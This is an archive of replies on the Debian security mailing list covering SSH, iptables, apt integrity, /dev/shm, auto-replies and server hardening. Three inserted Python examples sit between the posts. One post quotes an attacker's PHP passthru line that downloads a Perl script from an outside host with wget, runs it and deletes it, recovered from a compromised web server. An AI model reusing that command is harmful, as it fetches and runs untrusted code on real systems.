Re: instantbird: modified libpurple

2009-11-24 Thread Bernd Eckenfels
In article 0e753136-d929-11de-9b6a-001cc0cda...@msgid.mathom.us you wrote:
 My inclination is to say that this sort of thing is largely 
 unsupportable in a debian release. It's fine for unstable, but 2-3 years 
 from now is anyone going to be writing patches for instantbird 0.1.3.1 
 and its forked version of libpurple? 

Hu? This is an open source project with a forked code base like any other
project? Why don't you simply treat it as such?

Gruss
Bernd


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Re: HEAD's UP: possible 0day SSH exploit in the wild

2009-07-08 Thread Bernd Eckenfels
In article f971bab40907080937v33884e78nce8291d34140f...@mail.gmail.com you wrote:
 Is there a way to force keys AND passwd verification?

You know that if it's a protocol exploit (which is quite likely) that will
not help you much. tcpwrapper itself or ipfilter acts quite early in the
protocol stack - that might help.

Besides, I don't think you can force both; it's only one stage in the ssh protocol.
But your login shell could ask for the password via terminal. Maybe with pam.

Greetings
Bernd





Re: Securing my PC at a Wireless Hotspot?

2009-02-08 Thread Bernd Eckenfels
In article fe374f8d0902081747v4a99deadva1898142dac1d...@mail.gmail.com you wrote:
 Use a VPN or an SSH tunnel to a trusted source.

A very neat trick is using dynamic port forwarding of SSH (-D 1080). You only
need to log in to any SSH server and enable the auto forwarding. Then you can enter
the SSH client as a SOCKS proxy server and you are done (for surfing).

Gruss
Bernd





Re: Out of office replies

2009-01-17 Thread Bernd Eckenfels
In article e2e2e5500901162250s61454d0bh76d73469bfaef...@mail.gmail.com you wrote:
 So first prize is not having to use an auto-reply at all. Second prize
 is one that checks for common headers at the very least. If you don't
 have enough control over this (for example you're running exchange)
 you should either not subscribe that email address to a list, or you
 should not use the vacation feature.

Exchange observes the Precedence: list header. What I had done is an exim
smarthost with some filters (like if From: *-owner@) just adding the
Precedence header to stop auto answers to lists which do not set the
headers right. Ultimately the problem is on the side of the list software
(in the case of a missing header).

Gruss
Bernd


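An added example (not the exim filter Bernd describes) of the header checks this thread discusses, in Python: suppress a vacation reply when Precedence: list/bulk/junk, RFC 2369 List-* headers or Auto-Submitted are present, or when the sender is a *-owner@ style list address. The address suffixes and the sample messages are constructed assumptions of this example.

```python
"""Decide whether a vacation auto-reply may be sent for an incoming message.

Added example, not the exim filter from the thread. It applies the checks
the thread discusses: honour the Precedence: list header (as Exchange does),
treat mail from list owner/request addresses as list mail even when the list
software forgot the header, and never answer automatic mail (RFC 3834
Auto-Submitted). The sender suffixes below are an assumption modelled on the
"*-owner@" filter in the thread; the sample messages are constructed.
"""
from email import message_from_string

BULK_PRECEDENCE = {"list", "bulk", "junk"}
LIST_HEADERS = ("List-Id", "List-Post", "List-Unsubscribe")   # RFC 2369
LIST_SENDER_SUFFIXES = ("-owner@", "-request@", "-bounces@")  # assumption


def autoreply_reason(raw: str) -> str:
    """Return '' if an auto-reply is acceptable, else why it must be suppressed."""
    msg = message_from_string(raw)
    prec = (msg.get("Precedence") or "").strip().lower()
    if prec in BULK_PRECEDENCE:
        return f"Precedence: {prec}"
    if any(msg.get(h) for h in LIST_HEADERS):
        return "RFC 2369 list header present"
    auto = (msg.get("Auto-Submitted") or "no").strip().lower()
    if auto != "no":
        return f"Auto-Submitted: {auto}"
    # Envelope sender first; fall back to From:. An empty Return-Path (<>)
    # marks a bounce, which must never be answered either.
    sender = (msg.get("Return-Path") or msg.get("From") or "").strip().lower()
    if sender.startswith("<>") or any(s in sender for s in LIST_SENDER_SUFFIXES):
        return f"list/bounce sender {sender}"
    return ""


def should_autoreply(raw: str) -> bool:
    """True only when no suppression rule fired."""
    return autoreply_reason(raw) == ""


# Constructed samples.
LIST_MAIL = """\
From: Some User <user@example.org>
To: debian-security@lists.debian.org
Precedence: list
Subject: Re: Out of office replies

body
"""

LIST_MAIL_MISSING_HEADER = """\
Return-Path: <debian-security-owner@lists.debian.org>
From: Some User <user@example.org>
To: debian-security@lists.debian.org
Subject: list software forgot Precedence

body
"""

PERSONAL_MAIL = """\
From: Colleague <colleague@example.com>
To: me@example.com
Subject: lunch?

body
"""

if __name__ == "__main__":
    for name, raw in (("list", LIST_MAIL),
                      ("list-no-header", LIST_MAIL_MISSING_HEADER),
                      ("personal", PERSONAL_MAIL)):
        print(f"{name:15s} reply={should_autoreply(raw)!s:5s} {autoreply_reason(raw)}")
```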



Re: Out of office replies

2009-01-17 Thread Bernd Eckenfels
In article 42670320901170344i4a7eb397g5522af4b38375...@mail.gmail.com you wrote:
 Considering the wide number of installs of Exchange, you'd think
 they'd eventually fix that *in* Exchange

Exchange does the right thing.

Gruss
Bernd





Re: basically security of linux

2009-01-16 Thread Bernd Eckenfels
In article 20090117002104.ga...@wolfden.dnsalias.net you wrote:
 /tmp as tmpfs, but then we have /var/tmp (which can't
 be tmpfs, because its purpose is to retain the files even across reboots).

It is just supposed to hold larger data. No persistence in /var/tmp over
reboots required.

 I haven't tried it yet, but could a bind-mount be done (e. g. /var/real-tmp
 - /var/tmp) with additional options nosuid,nodev,... (while /var or / is
 mounted suid,dev,...)?

I am mounting /var as noexec; this works most of the time (dpkg has some
problems on install, but since I also run with a ro-root, I have a
pre-install script which changes both mount options before I use apt).

Gruss
Bernd





Re: Certification Authorities are recommended to stop using MD5 altogether

2009-01-01 Thread Bernd Eckenfels
In article 0901011447100.8...@somehost you wrote:
Signature Algorithm: md5WithRSAEncryption
^

 should be distributed at all.

Yes, because it is the self signature, but since we distribute the CA
certificate it is not checked but trusted. The question is if this CA signs
its issued certificates in a safe way or not.

Gruss
Bernd





Re: md5 hashes used in security announcements

2008-10-25 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I assume, it's tradition from the times, when only few people
 used apt-get and friends (and many years apt-get did not have
 signature support). A pointer to a generic description for
 people who don't want to/cannot use apt-get would be sufficient
 nowadays. Could someone from the security team correct me?

What I would much more prefer is a regularly signed list of
(non)announcements. This will make sure that anybody can verify if he is
not receiving alerts. If an entity is suppressing updates to the list, you see
the missing signature. Kinda CRL for Packages.

Then the alerts can skip URLs and checksums, since somebody who parses them
(instead of apt) to be sure his mirrors are not an old copy can use the new,
more reliable list.

Gruss
Bernd





Re: Mass-updating cached hosts keys afrer ssh security upgrade?

2008-07-21 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I've been trying to go through all the known_hosts files manually and update 
 them to give my users a break, but it's a tedious nightmare. Adding to the 
 complexity is that many of the known_hosts files are armored (the hostname/ip 
 address is not in plain text).

What kind of hosts are those? I would add all your machines to all
system-known_hosts and then delete the entries from user files.

The latter can be done with a shell script, and you should ask your users to
run it themselves. Just consisting of a loop, reading the hosts from
/etc/ssh/known_hosts and deleting them via

ssh-keygen -R $host

Greetings
Bernd


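The clean-up loop Bernd describes, as an added Python example (not a script from the thread): read the host names from the system known_hosts file and build one `ssh-keygen -R` call per name against a user's file, reporting hashed system entries whose names cannot be read back. The sample system file is constructed, and the dry_run switch and function names are this example's own.

```python
"""Remove per-user known_hosts entries for hosts listed in the system file.

Added example, not a script from the original thread. It implements the loop
Bernd describes: read the host names from /etc/ssh/known_hosts and run
`ssh-keygen -R <host>` against a user's ~/.ssh/known_hosts for each of them,
so the system-wide key is used instead of the stale cached copy. ssh-keygen -R
also removes hashed (|1|...) entries in the user file because it hashes the
name you give it; hashed entries in the *system* file cannot yield a name,
so they are counted and reported rather than silently skipped.
"""
import os
import shlex
import subprocess
from typing import Iterable, List, Tuple


def known_host_names(lines: Iterable[str]) -> Tuple[List[str], int]:
    """Return (host names found, number of hashed entries we could not read).

    A known_hosts line is: [@marker] hosts[,hosts...] keytype base64 [comment].
    Hosts may look like 'db1', '10.0.0.5' or '[git.example.org]:2222'.
    """
    names: List[str] = []
    hashed = 0
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):
            continue                    # @cert-authority/@revoked: not cached host keys
        if len(fields) < 3:
            continue                    # malformed line, ignore
        if fields[0].startswith("|1|"):
            hashed += 1                 # hashed name: nothing to pass to -R
            continue
        for name in fields[0].split(","):
            if name and name not in names:
                names.append(name)
    return names, hashed


def removal_commands(names: Iterable[str], user_file: str) -> List[List[str]]:
    """Build one `ssh-keygen -R <host> -f <user_file>` argv per host name."""
    return [["ssh-keygen", "-R", name, "-f", user_file] for name in names]


def clean_user_known_hosts(system_file: str = "/etc/ssh/known_hosts",
                           user_file: str = os.path.expanduser("~/.ssh/known_hosts"),
                           dry_run: bool = True) -> List[str]:
    """Drop stale per-user entries for every host named in the system file.

    With dry_run=True (the default) the commands are only returned, so a user
    can review what the script would do before running it for real.
    """
    with open(system_file) as fh:
        names, hashed = known_host_names(fh)
    if hashed:
        print(f"note: {hashed} hashed entries in {system_file} cannot be read back")
    cmds = removal_commands(names, user_file)
    if not dry_run and os.path.exists(user_file):
        for argv in cmds:
            subprocess.run(argv, check=False)   # -R keeps a .old backup
    return [shlex.join(argv) for argv in cmds]


# Constructed sample of a system known_hosts file (keys are placeholders).
SAMPLE_SYSTEM_KNOWN_HOSTS = """\
# managed centrally
db1,db1.example.org,10.0.0.5 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+EXAMPLE
[git.example.org]:2222 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLE
|1|salt+EXAMPLE=|hash+EXAMPLE= ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+EXAMPLE2
@cert-authority *.example.org ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+CAEXAMPLE
""".splitlines()

if __name__ == "__main__":
    names, hashed = known_host_names(SAMPLE_SYSTEM_KNOWN_HOSTS)
    for argv in removal_commands(names, "/home/alice/.ssh/known_hosts"):
        print(shlex.join(argv))
    print(f"{hashed} hashed system entries could not be read back")
```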



Re: Microsoft-IIS/6.0 serves up Debian... WTF!

2008-06-08 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 It's mirror's like that, that make me paranoid about Debian Security.

Why is that? IIS is the second most used web server on the market. And since
mirrors are not a trusted part of software distribution anyway, I don't see
an issue here.

Gruss
Bernd





Re: realpath in PS1 bash

2008-05-19 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I'm wondering if it would be a good idea to have PS1 set to
 
 '${debian_chroot:+($debian_chroot)[EMAIL PROTECTED]:$(realpath $(pwd))\$ '

Personally I don't like having the shell spawn an executable, since this will
slow down administration on heavily loaded systems. Maybe \pwd -P as a
shell builtin acts a bit nicer. However I am not sure if it results in the
same path in all cases. And it is still traversing lots of inodes.

Gruss
Bernd





Re: securing server

2008-05-07 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I already did the following:
 - installed chkrootkit
 - installed fail2ban (for ssh and proftpd)

Beware of DOS.

 - allow only one user (not root) via /etc/ssh/sshd_config, only ssh v2

If you have multiple administrators, you should not do that.

 Would you please list me which packages to install and which rules to apply ?

There are some hardening packages to look for. Besides that you should review
all running processes and turn off those which you don't need (X11 related,
rpc, hotplug stuff, etc.).

Besides that, what applications do you plan to run?

Gruss
Bernd





Re: Question about Security

2008-05-07 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 system, this system will be running in a data center and I don't want to
 have downtime !
 
 Hardware i use =
 
 server 1 x86 (hp ML330)
 server 2 IA64bit (HP rx1620)

The first thing you need to do is to limit yourself to a single platform.
This helps with patches, images, hardware replacements and will greatly
affect your downtimes.

Gruss
Bernd





Re: securing server

2008-05-07 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
*  Change the ports of most ports like ssh, ftp, smtp, imap etc. from the
default ones to some other ones.
 
From my poor understanding of security related issues, I guess this is
 totally useless since any (good) port scanner will defeat this without
 any problem. Remember, security by obscurity is a bad idea.

It helps to keep the noise in the logs low.

Gruss
Bernd





Re: apt-get may accept inconsistent data

2008-05-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Apt-get should not even send an If-Modified query imho. After
 fetching the Release file it already knows with near certainty if the
 local file is current or not. It should check the checksums of the
 local file and then either keep it or fetch it. Asking
 If-Modified-Since can only lead to triggering a bug like the squid
 one.

It would be possible to not base the If-Modified-Since on the file time but
on a date header inside the file. But in that case the mirrors will have to
react reasonably well to that.

Gruss
Bernd





Re: [SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

2008-05-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Apropos.  Is there a way to get that information from a vmlinuz file on
 disk?  Without booting it, that is.

Interestingly enough, my (somewhat older) file command only prints "x86
boot sector", but I think some magic files support it. Otherwise you can
use strings vmlinux | fgrep 2.

I usually use the file name to describe it.

Gruss
Bernd





Re: How to verify package integrity after they have been downloaded?

2008-04-06 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 If you are talking about automating the verification process, that
 wouldn't quite work. The system that downloads the packages might have
 been compromised. The files that I would sign on that system might
 have been already modified at the time when I sign them.

Yes you are right, does not work in your scenario.

But you can use the insecure system as a proxy and use apt-get/secure on the
trusted machine.

Gruss
Bernd





Re: How to verify package integrity after they have been downloaded?

2008-04-05 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 If some packages are locally modified, this suggests that your local system
 is already compromised.

Not if you use a NFS mounted shared cache.

It should be possible to verify the package at install time. (Especially
when not using apt-get.)

Not sure if debsig-verify can work in that environment.

Gruss
Bernd





Re: How to verify package integrity after they have been downloaded?

2008-04-05 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I trust the archive maintainers and have a secure way to get a copy of
 their public key. I don't trust individual developers and cannot have
 all of their keys securely distributed to me.

Yes, you would have to sign the packages with your own key after verifying
the release file.

Gruss
Bernd





Re: [SECURITY] [DSA 1447-1] New tomcat5.5 packages fix several vulnerabilities

2008-01-06 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 (java.io.FilePermission
 /home/nihil/www/java/WEB-INF/classes/logging.properties read)

 (it worked before the update and permissions are set correctly, I double 
 checked)

This is a Java security policy violation, not related to OS file
permissions. Maybe you started it with a security policy and did not before?

Gruss
Bernd





Re: netstat shows strange output

2008-01-06 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 tcp0  0 192.168.1.240:www   ba.2c.5646.static:34884 
 FIN_WAIT2 

Are you sure 192.168.1.240 is none of your addresses? Please post an ifconfig
output as well as netstat -tn.

 I've blocked this IP (resolves to 18255.com) on this machine using 
 iptables -I INPUT -s 66.116.125.131 -j DROP

What does 18255.com have to do with the above lines?

Gruss
Bernd





Re: ping22: can not kill this process

2008-01-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 It is for example used to map shared memory. ...
 
 No, it is a tmpfs directory for temporary files.  It has nothing to do
 with shared memory.

Why do you think it is named shm? It is used for shm_open and shm_unlink
(where glibc uses temporary files to mmap them).

On some systems (like mine) tmp is a symlink to it, or you use a second
instance of tmpfs. However, it is still used for shared memory (only).

Gruss
Bernd





Re: ping22: can not kill this process

2008-01-04 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Ah, I see.  I have never come across a program (yet) that uses it for
 shared memory.  Perhaps I'm just running the wrong programs.

The program itself is not using it; it's glibc 2.2 which does use that (for
POSIX shm, I think not for SYSV, so it's quite seldom used).

I need to double check, but one possible user could be Java with
-XX:+UseLargePages if it does not use hugetlbfs.

 Actually, some things use /dev/shm for non-shared-memory purposes.
 Like the resolvconf package.

I would consider that a bug, but sure possible.

Gruss
Bernd





Re: ping22: can not kill this process

2008-01-03 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
   I found the issue, it is one of the php script allowing the
 remote script to run.

This is a typical Apache exploit where remote file uploads are possible.

 passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl
 bb.txt;rm -f bb.txt*');

 What kind of applications are using /dev/shm? I googled
 around, seem not to find much information.
 Right now I mount it as rw,noexec,nosuid.

It is for example used to map shared memory. I am not sure, but I think
noexec and nodev are possible. However this does not solve your problem of an
insecure web app.

Gruss
Bernd





Re: ping22: can not kill this process

2007-12-30 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 www-data 16848 1 14 14:01 ?00:06:07 ping22

Looks like it is started from Apache, most likely a CGI. Have a look at the CWD
of that process or look into the access log.

Gruss
Bernd





Re: [SECURITY] [DSA 1438-1] New tar packages fix several vulnerabilities

2007-12-29 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 These releases are called 'point releases' and are prepared publicly.
 Preparation mails to these point releases are periodically sent to
 [EMAIL PROTECTED] Also prior releases had
 'Miscellaneous Bugfixes', see eg. [2]. The list of 'Miscellaneous
 Bugfixes' just got a bit bigger, as the last point release was for
 various reasons not 2 but 6 months ago. 

Hmmm, I think pushing point releases via the package pool and preparing a
new release directory would limit the confusion. I don't see a need to make
those packages available on security.d.o.

I think in the past we did exactly that with proposed-updates.

Greetings
Bernd





Re: Permission changes with rsync

2007-11-26 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I used rsync -av from source to target. (O.k., I missed to 
 add --numeric-ids, which resulted in getting some files with numeric owners), 
 But other files on the target got wrong owners or groups ! So, this should 
 not happen, IMO !

1. Are you root?
2. What is the numeric uid on source and target? (use ls -n)
3. On some? Do those all belong to one user, or dot files, or existing/non-existing?
4. Can you manually change the ownership? (What is the filesystem type, does it allow userids?)

Gruss
Bernd





Re: fail2ban vs. syslogd compression

2007-08-28 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Wouldn't a better option be to teach fail2ban how to parse the last
 message repeated.. messages?
 
 Maxim or Dann: When you find out how to do that, please post it to the list 
 for archiving / information-sharing purposes.

I can tell you the obvious: remember last and current line. If current
line != "last message repeated" then store it as last line and read next line
as current; otherwise increment the counter of the entry pointed to in last line
by the number of lines skipped and read next line as current. *g*

Sorry, no coding today :)

Gruss
Bernd


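The loop Bernd sketches, as an added example (not code from the thread or from fail2ban itself): a Python pass that folds "last message repeated N times" markers back into the entry they refer to, then counts failed ssh logins per source address so a ban threshold sees the real number of attempts. The syslog prefix layout and the sshd message pattern are assumptions, and the log lines are constructed.

```python
"""Expand syslogd's "last message repeated N times" compression.

Added example, not code from the original thread or from fail2ban. It
implements the approach Bernd sketches: remember the previous real line; when
the current line is a "repeated" marker, credit its count to that previous
line instead of treating the marker as a new event. A marker with no
preceding real line is dropped, since there is nothing to attribute it to.
The sample log lines below are constructed for the example.
"""
import re
from collections import Counter

# Assumed RFC 3164-style prefix: "Aug 28 10:15:01 host prog[pid]: message"
PREFIX_RE = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d \S+ (.*)$")
REPEAT_RE = re.compile(r"last message repeated (\d+) times?")
# Assumed sshd message shape for a failed password authentication.
FAILED_RE = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")


def _payload(line):
    """Strip timestamp and hostname; return 'prog[pid]: message' (or the line)."""
    m = PREFIX_RE.match(line)
    return m.group(1) if m else line


def expand_repeats(lines):
    """Yield (payload, count) for each logical log entry.

    A "last message repeated N times" marker yields nothing on its own;
    instead the count of the entry it refers to is raised by N.
    """
    last = None
    last_count = 0
    for line in lines:
        payload = _payload(line)
        m = REPEAT_RE.search(payload)
        if m:
            if last is not None:
                last_count += int(m.group(1))
            continue                      # marker consumed, not an entry
        if last is not None:
            yield last, last_count
        last, last_count = payload, 1
    if last is not None:
        yield last, last_count


def failed_logins(lines):
    """Count failed ssh logins per source IP, honouring repeat markers.

    Without expand_repeats a 'maxretry'-style threshold would see one attempt
    where syslogd actually collapsed several into a single marker line.
    """
    hits = Counter()
    for payload, n in expand_repeats(lines):
        m = FAILED_RE.search(payload)
        if m:
            hits[m.group(1)] += n
    return hits


# Constructed sample: a stray marker with nothing before it, five attempts
# from 192.0.2.10 collapsed into two lines, an unrelated cron entry, and
# three attempts from 198.51.100.7 collapsed into two lines.
SAMPLE_LOG = """\
Aug 28 10:14:00 gw last message repeated 3 times
Aug 28 10:15:01 gw sshd[4242]: Failed password for root from 192.0.2.10 port 51234 ssh2
Aug 28 10:15:09 gw last message repeated 4 times
Aug 28 10:16:00 gw CRON[4300]: (root) CMD (run-parts /etc/cron.hourly)
Aug 28 10:16:30 gw sshd[4250]: Failed password for invalid user test from 198.51.100.7 port 40000 ssh2
Aug 28 10:16:31 gw last message repeated 2 times
""".splitlines()

if __name__ == "__main__":
    for payload, n in expand_repeats(SAMPLE_LOG):
        print(f"{n:3d}x {payload}")
    print(dict(failed_logins(SAMPLE_LOG)))
```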



Re: Time to replace MD5?

2007-06-15 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Then they can wget the Release.gpg file, Release file, Packages file
 and check each in turn. Their choice.

Which is much more complicated than checking a given fingerprint (which is
very usual for advisories).

Gruss
Bernd





Re: ftpd - security thread ?

2007-05-05 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 to certain IP address on port 80. With simple bash script I have
 captured output of netstat while the ftpd package is getting
 installed:

Try tcpdump; maybe it helps us if we know the content of that connection.

 that IP address without me actually knowing about that? To me it seems
 as a security thread. At the moment it appears that this happens only
 if ftpd package is installed for a first time so
 # dpkg -P ftpd
 # apt-get install ftpd
 does not create any connections.

So you need to re-install Debian to reproduce it? Or how can you trigger it?
Are you installing it from CD? How does your apt/sources.list look? Do
you mean 4.0 or 3.1 Debian stable?

Greetings
Bernd





Re: Security Debian Questions

2007-04-23 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
  I read in there that it's preferred to set-up separate partitions for
 mount points such as /tmp, /var/tmp,  /home.

I would recommend using tmpfs for /tmp and having a MP for /var. On a
firewall you don't need /home. /usr and / would be RO. Whether you need a disk
based /var/tmp or not depends on the applications.

Gruss
Bernd





Re: Can ssh host keys be added to a gpg keyring?

2006-12-17 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I'm trying to design a backup solution where the backups are
 encrypted with a key that's specific to the host (rather than to users
 on the host). The sshd key seems to be a good fit for this, but ssh
 doesn't seem to provide encryption / decryption tools. GPG does, but I
 can't figure out how to add the ssh server key to the GPG keyring. Can
 this be done? Is there a better alternative that I'm missing?

Create one key for each purpose. I.e. as root create a GPG Backup key for
each host.

Gruss
Bernd





Re: This is an very serious bug

2006-12-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 This bug really should have critical or release-critical as severity
 level. It almost caused a production box with debian sarge to break.
 (/var filesystem full)

Which bug, please?

Gruss
Bernd





Re: [OT] Re: email notifications when users login

2006-09-22 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Thanks Michelle that worked perfect.  Is there an easy variable I could
 throw in there that you know off hand which would include the time
 (MM/DD/) as well?

NOW=`date`

Gruss
Bernd





Re: su - and su - what is the real difference?

2006-07-28 Thread Bernd Eckenfels
Michael Marsh [EMAIL PROTECTED] wrote:
 know if it really solves the same problem.  One problem it *does*
 solve is being able to disable the root access of someone who is no
 longer on the admin staff without having to change the root password.

This is better solved by using sudo and not giving out the root password at
all. However both methods are not really ensuring that an admin who once had
root access cannot use one of the backdoors or misconfigurations he has
introduced to gain back that trust level. Unless you really are paranoid in
monitoring your sysadmins, there is no real way to lock them out.

Bernd





Re: Request for comments: iptables script for use on laptops.

2006-05-24 Thread Bernd Eckenfels
Mike Dornberger [EMAIL PROTECTED] wrote:
  If I set up my firewall to accept only my local network (eg.
  -s 192.168.0.0/255.255.255.0) connecting to a port (eg. smtp), then
  anyone can spoof that too. So what's the point of creating rules? :)
 
 even if one can spoof the IP, he (= the attacker) can't do very much more
 (assuming, he can't read local traffic), at least with TCP connection.

And he needs to get around the ingress spoof filter. You of course don't
accept IP packets with the internal addresses on the external interface.

Gruss
Bernd





Re: Logauswertung

2006-04-23 Thread Bernd Eckenfels
Andreas [EMAIL PROTECTED] wrote:
 My problem: with which tool do I evaluate the logs for attacks (e.g.
 port scans) and mail them to myself?

I know you didn't want to hear this question, but I'll ask it anyway:
what for?

I would keep the logs for archival purposes. Individual blocked attacks
or port scans happen so often...

It is much better to monitor counters in order to detect DOS attacks or
misconfiguration, and, if you are worried about intrusion, to set up a few
internal rules that raise alarms when their counters start moving (outgoing
connections, connection attempts to domain controllers...)

Gruss
Bernd





Re: encrpyt harddrive without passphrase/userinput

2006-02-26 Thread Bernd Eckenfels
Horst Pflugstaedt [EMAIL PROTECTED] wrote:
 a) it must be able to boot (remotely) without userinput/passphrase

You can use nfs-root or initramdisk from a trusted machine. 

 b) the important partitions such as /etc, /var, /usr and /home must be
 encrypted/protected.
 
 I just ask myself why you bother encrypting a filesystem that will be
 accessible to anyone having access to the machine since it boots without
 password?

No password entry does not mean no password. A remote server for the password
can ensure that the machine can only boot on the right subnet and allows
easy erasing of all data by deleting the key on the server.

Gruss
Bernd





Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread Bernd Eckenfels
martin f krafft [EMAIL PROTECTED] wrote:
 None that I know. I suggest using a second nameserver to resolve the
 A record to the internal IP.

Split-brain DNS.

Gruss
Bernd





Re: Security implications of tty group?

2006-01-25 Thread Bernd Eckenfels
Thomas Hood [EMAIL PROTECTED] wrote:
 What are the security implications of a tty device node failing to belong
 to group tty?

It depends on who has access to that group, what the permissions of the
tty are and what is intended.

Generally you want to restrict write access to a tty to a trusted person,
because otherwise she can use escape sequences to cause all kinds of
problems (reprogramming keyboard, playing ascii movies, reading screen).
write(1) can filter messages, and it enforces the cleanness. Therefore it
uses sgid tty. So if a user says mesg yes, she actually wants to allow write
access and not raw access. That's why a warning is a good thing.

Gruss
Bernd





Re: Security implications of allowing init to re-exec from another path

2006-01-04 Thread Bernd Eckenfels
martin f krafft [EMAIL PROTECTED] wrote:
 ... sounds like a nice way to infest a system with a trojan, in
 addition to kernel modules and other Linux maladities. That is, if
 the attacker gets root...

However, root can also patch the init image and get the same result. So it
is better if init is actually supporting this, logging it and manipulating
the cmdline so that it is obvious.

Gruss
Bernd





Re: hardening checkpoints

2005-12-17 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Actually, iptables -A INPUT will _append_ a rule to your INPUT chain
 (iptables(8)), and this won't help you if your connection is matched by
 an earlier blocking rule. To really make sure that you can reach the
 machine after a failed firewall-reconfiguration, replace -A with -I,
 which makes the rule inserted at the head of the chain, and hence, the
 first rule to be matched.

And don't forget to do this to the other tables, at least OUTPUT, also.

Gruss
Bernd





Re: hardening checkpoints

2005-12-15 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 BTW - FTP *has* to be available - many of the users only know how to use
 FTP.

Give them WinSCP :)

Gruss
Bernd





Re: Port 699 listening

2005-12-14 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 netstat -na | grep 699
 tcp0  0 0.0.0.0:699 0.0.0.0:*   LISTEN

If you run it as root and use netstat -lnpo it will give you the PID and
process name of the open listening socket.

In some rare cases netstat won't help; then you could use lsof -i :699 also
(as root).

Gruss
Bernd





Re: Question about iptables

2005-12-05 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Chain INPUT (policy DROP)
 target prot opt source   destination
 ACCEPT all  --  anywhere anywhere  

 The first line does not include state Related, established or state 
 established...
 
 Does it mean that all trafic will be allowed ?

Yes.

 A network scan shows me that all packets are dropped !!!

Maybe in the OUTPUT or FORWARDING rules? What kind of scan?

Try to look for counters and other hints with -v.

Gruss
Bernd





Re: What is a security bug?

2005-11-23 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Well, obviously it is not a _security_ bug, since it has nothing to do
 with security.
...
 well, that's obvious for me, but maybe someone else has a different
 opinion about this issue?

Your definition and mine of security are not compatible :) 

(availability is a security discipline and a DOS is a security attack for
me). But I think we had this discussion before on this list...

However it doesn't matter, you are right: critical application crashes
(especially if triggerable by untrusted peers) are critical enough to be
fixed anyway. AND crashes often have the potential to be exploitable
(stack smashing?).

Gruss
Bernd





Re: whitehat to test a security config

2005-11-03 Thread Bernd Eckenfels
On Fri, Nov 04, 2005 at 01:19:36AM +0100, Javier Fernández-Sanguino Peña wrote:
 But also somewhat wrong: a black-box test is much cheaper than a full
 security audit of a system.

Well, I guess you mean port scan. A Tiger Team who helps your security is
most often quite expensive because it takes a lot of attacks - including
on-site social engineering.

To run nessus you do not need to spend any money, that's right.

Gruss
Bernd





Re: whitehat to test a security config

2005-11-02 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 I'm looking for (preferably) a company, or individual, to attempt to 
 breach a standard config I have created to deploy client applications 
 in production. It is intentionally a minimal config which is tightly 
 locked down and audited daily.

I think it is very bad efficiency to do black-box testing, because it
requires a very good attacker and much time to find a problem. And if you
don't find one, you can't be sure you are secure. It is much better to let
the external auditor verify your configuration. Give them access to all
config files and documentation, your risk matrix etc. This is much cheaper
and much more successful.

Gruss
Bernd





Re: CAN to CVE: changing changelogs?

2005-10-26 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Wouldn't one of the goals of the change to just one name instead of two
 per issue be to facilitate things like googling, grepping and other
 searching on CVE id's? Then it would make sense to unify the names as
 widely as possibe.

Those issues are old, and the work to look up the new ids and change them is
quite big.

Gruss
Bernd





Re: WTF: Debian security, ex. Linux kernel vulnerabilities

2005-09-20 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Don't let primary mirrors pull, push the updates to them.

Make the mirrors simple reverse http caches for the packages.

Gruss
Bernd





Re: Abwesenheit

2005-09-19 Thread Bernd Eckenfels
In article [EMAIL PROTECTED] you wrote:
 Is there a reason not to simply read the Precedence: list header
 and simply not respond at all ?

